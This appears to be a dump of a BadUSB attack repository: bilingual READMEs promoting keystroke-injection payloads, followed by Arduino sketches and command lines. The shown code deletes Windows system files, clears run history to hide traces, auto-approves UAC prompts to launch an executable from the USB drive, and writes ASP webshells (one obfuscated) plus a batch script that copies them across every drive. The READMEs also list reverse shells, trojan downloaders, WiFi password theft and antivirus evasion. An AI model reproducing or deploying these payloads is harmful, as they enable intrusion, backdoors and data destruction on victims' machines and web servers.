cmd /c "del /f /q C:\Windows\System32\taskmgr.exe"
cmd /c "taskkill /f /im explorer.exe&echo "h">c:\windows\explorer.exe"

================================================
FILE: README.cn.md
================================================
# BadUSB
![](https://img.shields.io/badge/BadUSB-fsociety-red)<br>
该项目利用USB协议上的漏洞，通过更改USB的内部固件，在接入USB接口后，模拟外置鼠标、键盘的功能，以此来使目标主机执行已经精心构造好的命令。<br>

![68747470733a2f2f696d616765732e67697465652e636f6d2f75706c6f6164732f696d616765732f323032312f303230322f3231333933325f36653462313436665f323332333636362e6a706567](https://user-images.githubusercontent.com/39434325/112772972-75a8e900-9066-11eb-9948-895916bf18ef.jpg)<br>
#### QQ交流群：775942445
#### 加微信-进入交流群：wwy18795980897

### 前言
和大多数人一样，最初见到BadUSB是在美剧《黑客军团》中，是fsociety组织常用的工具之一，无论是向服务器下载木马控制被害者主机，还是达琳在停车场帅气的扔出大量USB钓鱼，BadUSB都是功不可没的物理武器之一。  
![黑客军团](https://upload-images.jianshu.io/upload_images/11477676-71045c807dac0df6.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### 优势
在USB攻击领域，很多年前常用的是老式USB病毒（自动运行）autorun.inf，但文件现在已经会被杀毒软件轻易地查杀，与autorun.inf不同，BadUSB是利用了USB协议上的漏洞，通过更改USB的内部固件，在正常的USB接口接入后，模拟外置鼠标、键盘的功能，以此来使目标主机执行已经精心构造好的命令。在此过程中不会引起杀毒软件、防火墙的一丝怀疑。而且因为是在固件级别的应用，U盘格式化根本无法阻止其内部代码的执行。  
![Leonardo_Arduino](https://upload-images.jianshu.io/upload_images/11477676-4347a3e41663dde6.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>
我最新欢的是Leonardo_Arduino板子，因为同样是对USB的利用，Windows、Linux、MAC等各类操作系统默认存在leonardo_Arduino的USB接口驱动，不必联网下载专用的驱动程序。此外，向BadUSB烧录的程序极为简单，大部分是对键盘、鼠标按键进行模拟，上手较为容易。  
BadUSB也是社会工程学的一个典型示例，它极大地利用了人们的好奇心，在路边捡到的USB，估计九成以上的人们都想看看里面有什么东西，而当你插入个人主机或公司内网，攻击就很难再停止下来了。<br>
![BadUSB钓鱼](https://upload-images.jianshu.io/upload_images/11477676-3d1f812778254931.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### 教程
[具体步骤请移步至简书](https://www.jianshu.com/p/2b2b1dab85fe) <br>
![操作步骤](https://upload-images.jianshu.io/upload_images/11477676-390539861bec703c.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### 目录导图<br>

     BadUSB
     │  LICENSE
     │  README.en.md
     │  README.md
     │  
     ├─BlueScreen蓝屏
     │      BlueScreen蓝屏1（DOS）.ino
     │      BlueScreen蓝屏2（DOS）.ino
     │      BlueScreen蓝屏3（DOS）.ino
     │      xp和win7的蓝屏代码（DOS攻击）.ino
     │      延迟蓝屏（DOS）.ino
     │      注册表写入致使开机蓝屏通用（DOS）.ino
     │      注册表写入致使开机蓝屏（DOS）.ino
     │      
     ├─CobaltStrike木马联动
     │  │  BitsAdmin木马执行（与CS联动）.ino
     │  │  Pl木马执行（与CS联动）.ino
     │  │  PSL木马执行（与CS联动）.ino
     │  │  PY木马执行（与CS联动）.ino
     │  │  Regsvr32木马执行（与CS联动）.ino
     │  │  
     │  ├─CobaltStrike各种语言的Payload
     │  │      payload.bin
     │  │      payload.c
     │  │      payload.cs
     │  │      payload.java
     │  │      payload.pl
     │  │      payload.ps1
     │  │      payload.py
     │  │      payload.rb
     │  │      payload.sct
     │  │      payload.txt
     │  │      payload.vba
     │  │      
     │  └─CounterStrike木马制作教程
     │          CounterStrike.jpg
     │          CounterStrike木马制作教程.png
     │          
     ├─DNS劫持
     │      DOS命令设置多个DNS（DNS劫持）.ino
     │      PSL命令设置多个DNS（DNS劫持）.ino
     │      
     ├─Linux内置反向Shell
     │      Linux内置的反向Shell（BashShell）.ino
     │      Linux反向Shell（PerlShell）.ino
     │      Linux反向Shell（代码执行）.ino
     │      
     ├─MSF木马联动
     │      shell.apk
     │      shell.asp
     │      shell.aspx
     │      shell.elf
     │      shell.exe
     │      shell.jar
     │      shell.jsp
     │      shell.macho
     │      shell.php
     │      shell.pl
     │      shell.psl
     │      shell.py
     │      shell.sh
     │      shell.war
     │      Shell木马生成配置.txt
     │      
     ├─OSX内置反向Shell
     │      osx系统反向连接（dns_shell）.ino
     │      osx系统反向连接（perl_shell）.ino
     │      osx系统反向连接（ruby_shell）.ino
     │      
     ├─PSL全屏HACKED画面
     │  ├─FullScreenHackedv0
     │  │  │  get.ps1
     │  │  │  
     │  │  └─FullScreenHackedv
     │  │          FullScreenHackedv.ino
     │  │          
     │  ├─FullScreenHackedv2
     │  │      FullScreenHackedv2.ino
     │  │      wall.ps1
     │  │      
     │  └─FullScreenHackedv3[慎用]
     │      │  get.ps1
     │      │  
     │      └─FullScreenHackedv3
     │              FullScreenHackedv3.ino
     │              
     ├─Ubuntu信息搜集
     │      Ubuntu信息搜集到TXT文件（信息）.ino
     │      Ubuntu的基本终端命令（显示）.ino
     │      
     ├─WIFI密码获取
     │      WIFI密码导出（工具）.ino
     │      Wifi密码捕获（工具）.ino
     │      
     ├─WIFI连接木马
     │      强迫连接指定WIFI并下载psl木马运行（木马入侵）.ino
     │      
     ├─代码原理解读
     │      arduino按键代码基础.ino
     │      MSF木马制作教程.txt
     │      关于setup和loop方法的说明.txt
     │      
     ├─木马下载器
     │  ├─CERTUTIL木马下载器（木马攻击）代码
     │  │      链接服务器msf木马certutil下载版.ino
     │  │      
     │  ├─FTP木马下载器（木马攻击）代码
     │  │      FTP下载netcat并反向连接shell（木马攻击）.ino
     │  │      
     │  ├─JAVA木马写入（木马攻击）代码
     │  │      java木马写入（目标环境可运行Java）.ino
     │  │      server.java
     │  │      
     │  ├─PSL木马下载器（木马攻击）代码
     │  │      powershell下载服务器木马.ino
     │  │      psl木马下载器1（木马攻击）.ino
     │  │      psl木马下载器2（木马攻击）.ino
     │  │      psl木马下载器3通用（木马攻击）.ino
     │  │      psl木马下载器4通用（木马攻击）.ino
     │  │      psl木马下载器win&linux通用（木马攻击）.ino
     │  │      psl木马写入并反弹（木马攻击）.ino
     │  │      下载psl木马并二次执行（木马攻击）.ino
     │  │      链接服务器msf木马psl下载版.ino
     │  │      链接服务器psl下载版.ino
     │  │      
     │  └─PY木马下载器（木马攻击）代码
     │          PyShellServer.py
     │          Py木马写入（目标环境可运行Python）.ino
     │          
     ├─添加用户并开启服务
     │      添加用户并开启3389（工具）.ino
     │      添加用户并开启ftp（工具）.ino
     │      
     ├─特定功能代码
     │      Alt_F4循环关闭窗口后关机（工具）.ino
     │      Shift后门（工具）.ino
     │      单纯改变所有用户密码（恶作剧项）.ino
     │      启动PSL远程连接功能（工具）.ino
     │      强制删除360各项进程（工具）.ino
     │      强制执行关机ShutDown命令（工具）.ino
     │      截屏并发送指定FTP地址（工具）.ino
     │      打开对方445端口（内网渗透）.ino
     │      打开指定网页（工具）.ino
     │      更改所用账户密码+关闭系统进程+蓝屏（工具）.ino
     │      添加用户代码（工具）.ino
     │      简简单单关个机（恶作剧项）.ino
     │      隐藏CMD窗口（显示）.ino
     │      鼠标不停移动（工具）.ino
     │      
     ├─网站一句话入侵代码
     │      aspx一句话木马写入（网站服务器版本-过狗过D盾）.ino
     │      aspx一句话木马写入（网站服务器版本） .ino
     │      asp一句话木马写入（网站服务器版本-Script Encoder 加密）.ino
     │      asp一句话木马写入（网站服务器版本-动态解码）.ino
     │      asp一句话木马写入（网站服务器版本） .ino
     │      jsp一句话木马写入（jsp网站服务器使用）.ino
     │      jsp木马写入（jsp网站服务器使用非一句话）.ino
     │      php木马写入（php网站服务器使用-异或绕过）.ino
     │      php木马写入（php网站服务器使用-类绕过）.ino
     │      php木马写入（php网站服务器使用）.ino
     │      
     └─运行U盘内的程序_扩大入侵范围
         ├─UdiskRun
         │      UdiskRun.ino
         │      
         ├─UdiskRunv2
         │      UdiskRunv2.ino
         │      
         └─UdiskRunv3
                UdiskRunv3.ino


### 演示<br>
[更改所用账户密码+关闭系统进程+蓝屏测试](https://www.yuque.com/u12074055/gzgwfh/dg804t)<br>
![演示](https://upload-images.jianshu.io/upload_images/11477676-31390e8446540ca3.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### 进阶<br>
网站一句话入侵<br>
BadUSB&MSF联动<br>
BadUSB&CS联动<br>
WIFI局域网入侵<br>
运行U盘内的程序_扩大入侵范围<br>
![进阶](https://upload-images.jianshu.io/upload_images/11477676-cc6c47da713ac2e2.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### 解疑<br>
你可以在微信、QQ群、Gitee、Gihub上留言，团队看到后会尽快回复。
![常见问题和错误](https://upload-images.jianshu.io/upload_images/11477676-0c90a8004d5e5420.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### 扩展<br>
实现特定功能<br>
其他实现BadUSB功能的板子（需要另安驱动，不是特别推荐）<br>
![扩展](https://upload-images.jianshu.io/upload_images/11477676-bba7de72abd2072d.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### 更新<br>
###### 2021.02.06更新代码，部分是从其他爱好者哪里搜寻的开源代码，部分是与MSF联动的方法流程以及我认为比较好用的Arduino Leonardo基础按键代码<br>
###### 2021.02.14更新代码，从其他优秀项目中获得启发，加入了CobaltStrike联动的木马、DNS劫持代码、linux和osx内置反向shell、WIFI连接木马、WIFI密码获取、网站一句话入侵代码、psl全屏hacked画面、运行U盘内的程序_扩大入侵范围以及实现很多实用功能的代码，情人节快乐！<br>
![更新](https://upload-images.jianshu.io/upload_images/11477676-a54932b08d3ef2da.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### 项目链接<br>

代码已上传至GitHub及Gitee，**跪求star**，其他项目也挺好玩的， **继续跪求Star**。<br>

 **GitHub：** https://github.com/wangwei39120157028/BadUSB<br>
 
 **Gitee：**  https://gitee.com/wwy2018/BadUSB<br>


================================================
FILE: README.md
================================================
# BadUSB
![](https://img.shields.io/badge/BadUSB-fsociety-red)<br>
This project takes advantage of the loophole in USB protocol. By changing the internal firmware of USB, after accessing the USB interface, it simulates the functions of external mouse and keyboard, so as to make the target host execute the well-constructed commands.<br>

![68747470733a2f2f696d616765732e67697465652e636f6d2f75706c6f6164732f696d616765732f323032312f303230322f3231333933325f36653462313436665f323332333636362e6a706567](https://user-images.githubusercontent.com/39434325/112772972-75a8e900-9066-11eb-9948-895916bf18ef.jpg)<br>
#### QQ：775942445<br>
#### WeChat：wwy18795980897<br>

### Introduction<br>
Like most of us, BadUSB was first introduced in Mr. Robot and is one of the FSociety's most popular tools. Whether it's downloading a Trojan to a server to control a victim's host, or Darlene throwing a bunch of USB phishing devices in a parking lot, BadUSB is one of the most important physical weapons.  <br>
![黑客军团](https://upload-images.jianshu.io/upload_images/11477676-71045c807dac0df6.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### Advantage<br>
Is commonly used in the field of USB attack, many years ago old USB virus (automatic) autorun. Inf, but the file is now will be antivirus software easily detected, and the autorun. J inf, BadUSB is to use a loophole in the USB protocol, by changing the interior of the USB firmware, after normal USB port access, to simulate the external function of the mouse, keyboard, in order to make the target host execution has been carefully constructed good command. In this process will not cause anti-virus software, a trace of suspicion firewall. And because it's at the firmware level, USB flash drive formatting can't prevent the execution of its internal code.  <br>
![Leonardo_Arduino](https://upload-images.jianshu.io/upload_images/11477676-4347a3e41663dde6.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

My latest favorite is leonardo_Arduino board, because the same is the use of USB, Windows, Linux, Mac and other operating systems default existence leonardo_Arduino USB interface driver, do not have to network download dedicated driver. In addition, to BADUSB burning procedures are very simple, most of the keyboard, mouse keys for simulation, easy to get started.  <br>
BadUSB is also a good example of social engineering. It plays on people's curiosity. It's estimated that more than 90% of people will want to see what's inside a USB they pick up on the side of the road.  <br><br>
![BadUSB钓鱼](https://upload-images.jianshu.io/upload_images/11477676-3d1f812778254931.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### Tutorial  <br>
[Video address](https://www.yuque.com/u12074055/cpuceb/qicml3) <br>
Video: Introduction to BsdUSB Compiler<br>
Video: BadUSB driver installation and code writing<br>
Video: BadUSB basic operation<br>
[For detailed steps, please go to the brief book](https://www.jianshu.com/p/2b2b1dab85fe) <br>
![操作步骤](https://upload-images.jianshu.io/upload_images/11477676-390539861bec703c.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### Directory<br>
    
    BadUSB
     │  LICENSE
     │  README.en.md
     │  README.md
     │  
     ├─AddUser_StartService
     │      AddUser_Enable3389(tools).ino
     │      AddUser_EnableFTP(tools).ino
     │      
     ├─BlueScreen
     │      BlueScreen1(DOS).ino
     │      BlueScreen2(DOS).ino
     │      BlueScreen3(DOS).ino
     │      BlueScreen_xp_win7(DOS).ino
     │      DelayedBlueScreen (DOS).ino
     │      RegistryWriteBlueScreen (DOS).ino
     │      RegistryWriteBlueScreenGeneralUse (DOS).ino
     │      
     ├─CobaltStrike_Trojanlinkage
     │  │  Bitsadmin_TrojanExecution (LinkageWithCS).ino
     │  │  Pl_TrojanExecution (LinkageWithCS).ino
     │  │  PSL_TrojanExecution (LinkageWithCS).ino
     │  │  PY_TrojanExecution (LinkageWithCS).ino
     │  │  Regsvr32_TrojanExecution (LinkageWithCS).ino
     │  │  
     │  ├─CobaltStrike_Payload
     │  │      payload.bin
     │  │      payload.c
     │  │      payload.cs
     │  │      payload.java
     │  │      payload.pl
     │  │      payload.ps1
     │  │      payload.py
     │  │      payload.rb
     │  │      payload.sct
     │  │      payload.txt
     │  │      payload.vba
     │  │      
     │  └─CounterStrikeTrojanTutorial
     │          CounterStrike.jpg
     │          CounterStrikeTutorial.png
     │          
     ├─CodePrincipleInterpretation
     │      ArduinoKeyCodeBase.ino
     │      InstructionsOn_setup_loop_Methods.txt
     │      MSF_TrojanMakingTutorial.txt
     │      
     ├─DNSHijack
     │      DOS_CommandSetMultipleDNS(DNSHijack).ino
     │      PSL_CommandSetMultipleDNS(DNSHijack).ino
     │      
     ├─Linux_Built-inReverseShell
     │      LinuxReverseShell (CodeExecution).ino
     │      LinuxReverseShell(BashShell).ino
     │      LinuxReverseShell(PerlShell).ino
     │      
     ├─MSF_Trojanlinkage
     │      shell.apk
     │      shell.asp
     │      shell.aspx
     │      shell.elf
     │      shell.exe
     │      shell.jar
     │      shell.jsp
     │      shell.macho
     │      shell.php
     │      shell.pl
     │      shell.psl
     │      shell.py
     │      shell.sh
     │      shell.war
     │      Shell_TrojanGenerationConfiguration.txt
     │      
     ├─OSX_Built-inReverseShell
     │      OSX_SystemReverseConnection (dns_shell).ino
     │      OSX_SystemReverseConnection (perl_shell).ino
     │      OSX_SystemReverseConnection (ruby_shell).ino
     │      
     ├─PSL_FullScreen-HACKED
     │  ├─FullScreenHackedv0
     │  │  │  get.ps1
     │  │  │  
     │  │  └─FullScreenHackedv
     │  │          FullScreenHackedv.ino
     │  │          
     │  ├─FullScreenHackedv2
     │  │      FullScreenHackedv2.ino
     │  │      wall.ps1
     │  │      
     │  └─FullScreenHackedv3
     │      │  get.ps1
     │      │  
     │      └─FullScreenHackedv3
     │              FullScreenHackedv3.ino
     │              
     ├─RunProgramOn_UDrive_ExpandScopeOfIntrusion
     │  ├─UdiskRun
     │  │      UdiskRun.ino
     │  │      
     │  ├─UdiskRunv2
     │  │      UdiskRunv2.ino
     │  │      
     │  └─UdiskRunv3
     │          UdiskRunv3.ino
     │          
     ├─Site_AWord_IntrusionCode
     │      AspSentenceTrojanWrite(webServerVersion).ino
     │      AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino
     │      AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino
     │      AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino
     │      AspxSentenceTrojanWrite(webServerVersion).ino
     │      JspSentenceTrojanWritten (JSP_websiteServerUse).ino
     │      JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino
     │      PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino
     │      PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino
     │      PHP_TrojanWrite(usedByPHP_websiteServer).ino
     │      
     ├─SpecificFunctionCode
     │      AddUserCode(Tools).ino
     │      Alt-f4_Loop.ino
     │      ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino
     │      EnablePSL_RemoteConnection(Tools).ino
     │      ForcedDeletionOf360Processes(Tools).ino
     │      ForceShutDownCommand(Tool).ino
     │      Hide_CMD_Window(Display).ino
     │      MouseKeepsMoving(Tools).ino
     │      OpenPort445.ino
     │      OpenSpecified_webPage.ino
     │      ShiftBackdoor.ino
     │      SimplyChangeAllUsersPasswords(TrickItem).ino
     │      SimplyShutDownMachine(TrickItem).ino
     │      TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino
     │      
     ├─TrojanDownloader
     │  ├─CERTUTIL_DownLoader
     │  │      CERTUTIL_DownLoader_MSF.ino
     │  │      
     │  ├─FTP_DownLoader
     │  │      FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino
     │  │      
     │  ├─JAVA_DownLoader
     │  │      JavaTrojanWrite(TargetEnvironmentRunJava).ino
     │  │      server.java
     │  │      
     │  ├─PSL_DownLoader
     │  │      Downloa_PSL_Trojan-Execute_aSecondTime.ino
     │  │      LinkServer_MSF_PSL_Download.ino
     │  │      LinkServer_PSL_Download.ino
     │  │      PSL_DownLoader0.ino
     │  │      PSL_DownLoader1.ino
     │  │      PSL_DownLoader2.ino
     │  │      PSL_DownLoader3.ino
     │  │      PSL_DownLoader4.ino
     │  │      PSL_Downloader_Win&Linux_General.ino
     │  │      PSL_Writes_Bounces.ino
     │  │      
     │  └─PY_DownLoader
     │          PyShellServer.py
     │          Py_TrojanWrite(TargetEnvironmentRunPython).ino
     │          
     ├─Ubuntu_InformationGathering
     │      BasicTerminalCommandsForUbuntu(Display).ino
     │      UbuntuInformationCollectionTXT_File(Information).ino
     │      
     ├─WiFi_ConnectionTrojan
     │      ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino
     │      
     └─WiFi_PasswordAcquisition
             WiFiPasswordCapture(tool).ino
             WiFiPasswordExport(tool).ino
        
### Demo<br>
[Video address](https://www.yuque.com/u12074055/gzgwfh/dg804t) <br>
Video: [Hardware Hacker] Control the upload through WiFi to execute, run, write HID scripts for BADUSB as well as a small extra 1<br>
Video: [Hardware Hacker] Control the upload via WiFi to execute, run, and write HID scripts for BADUSB as well as a small extra 2<br>
Video: [BADUSB Demo] U Drive Attack: Ignore any kill soft, hack your computer in 3 seconds!<br>
Video: [BADUSB Demo] Invading Square Large Screen, with Tutorial 1<br>
Video: [BADUSB Demo] Invading Square Large Screen, with Tutorial 2<br>
Video: [BADUSB demo] BADUSB implementation record keyboard<br>
Video: [BADUSB demo] Change the password of the account used + close the system process + blue screen test<br>
![演示](https://upload-images.jianshu.io/upload_images/11477676-31390e8446540ca3.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### Advanced<br>
[Video address](https://www.yuque.com/u12074055/cpuceb/dm1veu) <br>
Video: Badusb&MSF linkage<br>
Video: Start BadUSB with Nethunter<br>
![进阶](https://upload-images.jianshu.io/upload_images/11477676-cc6c47da713ac2e2.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### Frequently asked questions and errors<br>
[Video address](https://www.yuque.com/u12074055/cpuceb/uofha2) <br>
Video: BadUSB code writes exception handling<br>
![常见问题和错误](https://upload-images.jianshu.io/upload_images/11477676-0c90a8004d5e5420.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### extension<br>
[Video address](https://www.yuque.com/u12074055/cpuceb/hs3n7p) <br>
Video: [Hardware Hacker] Nine dollars to make a BadUSB<br>
Video: [Hardware Hacker] can directly replace Big Yellow Duck and Wifiducky's new BadUSB<br>
Video: BadUSB Tutorial Digispark + Chinese BadUSB<br>
![扩展](https://upload-images.jianshu.io/upload_images/11477676-bba7de72abd2072d.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### Update<br>
###### 2021.02.06 update code, part of which is the open source code searched from other enthusiasts, part of which is the method flow linked with MSF and the Arduino Leonardo basic key code that I think is better to use<br>
###### 2021.02.14 update code, gain inspiration from other good project, join the trojans, DNS hijacking CobaltStrike linkage code, Linux and osx reverse shell, WIFI connection trojans, built-in WIFI password access, website a word invasion code, PSL full-screen hacked images, running programs in the U dish _ for expanding the scope of the invasion, and realize a lot of practical function code, the valentine day is joyful!<br>
![更新](https://upload-images.jianshu.io/upload_images/11477676-a54932b08d3ef2da.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>

### Link<br>
The code has been uploaded to GitHub and Gitee, **beg star**, other projects are also very fun, **continue to beg star**.<br>

**GitHub：** https://github.com/wangwei39120157028/BadUSB<br>

**Gitee：**  https://gitee.com/wwy2018/BadUSB<br>


================================================
FILE: RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRun/UdiskRun.ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("cmd /k reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");
  delay(500);
  Keyboard.println("for /f %a in (\'wmic volume get driveletter^,label ^| Find \"LEMONC\"\') do (set ab=%a)");
  delay(100);
  Keyboard.println("copy /y %ab%\\x.exe %tmp%&%tmp%\\x.exe&exit");
  delay(1000);
    Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("powershell -c start-process -Filepath cmd \' /k reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f\'-verb runas");
  delay(3000);
 Keyboard.press(KEY_LEFT_ALT);
 Keyboard.print('y');
 Keyboard.release(KEY_LEFT_ALT);
 delay(1000);
 Keyboard.println("for /f %a in (\'wmic volume get driveletter^,label ^| Find \"LEMONC\"\') do (set ab=%a)");
 delay(500);
 Keyboard.println("copy /y %ab%\\x.exe %tmp%&%tmp%\\x.exe&exit");
 Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv2/UdiskRunv2.ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("CMD /K REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F");
  delay(500);
  Keyboard.println("POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS&TASKKILL /F /IM CMD.EXE");
  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  for(int i=0;i<100;i++){
    delay(10);
    Keyboard.print('y');
  }
   Keyboard.release(KEY_LEFT_ALT);
 delay(1000);
  Keyboard.println("FOR /F %A IN (\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \"lemonc\"\') DO (SET AB=%A)");
  delay(300);
  Keyboard.println("%AB%\\X.EXE&&TASKKILL /F /IM CMD.EXE");
 Keyboard.press(KEY_CAPS_LOCK);
 Keyboard.release(KEY_CAPS_LOCK);
 Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
  
}


================================================
FILE: RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv3/UdiskRunv3.ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("CMD /c REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS");
  delay(1500);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
 delay(1000);
  Keyboard.println();
  delay(300);
  Keyboard.println("FOR /F %A IN (\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \"lemonc\"\') DO (SET AB=%A)");  //lemonc可替换
  delay(300);
  Keyboard.println("%AB%\\X.EXE&&TASKKILL /F /IM CMD.EXE");
 Keyboard.press(KEY_CAPS_LOCK);
 Keyboard.release(KEY_CAPS_LOCK);
 Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{ 
}


================================================
FILE: Site_AWord_IntrusionCode/AspSentenceTrojanWrite(webServerVersion).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println('echo ^<%eval request("wwy")%^> >> hacked.asp');  //向hacked.asp写内容,密码wwy
  delay(200); 
  
  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入asp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("echo ^<% >> hacked.asp");  //向hacked.asp写内容,密码z
  delay(200); 
  Keyboard.println("echo Function MorfiCoder(Code) >> hacked.asp");
  delay(200); 
  Keyboard.println("echo MorfiCoder=Replace(Replace(StrReverse(Code),'/*/',''''),'\*\',vbCrlf) >> hacked.asp");
  delay(200); 
  Keyboard.println("echo End Function >> hacked.asp");
  delay(200); 
  Keyboard.println('echo Execute MorfiCoder(")/*/z/*/(tseuqer lave") >> hacked.asp');
  delay(200); 
  Keyboard.println("echo %^> >> hacked.asp");
  delay(200); 

  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
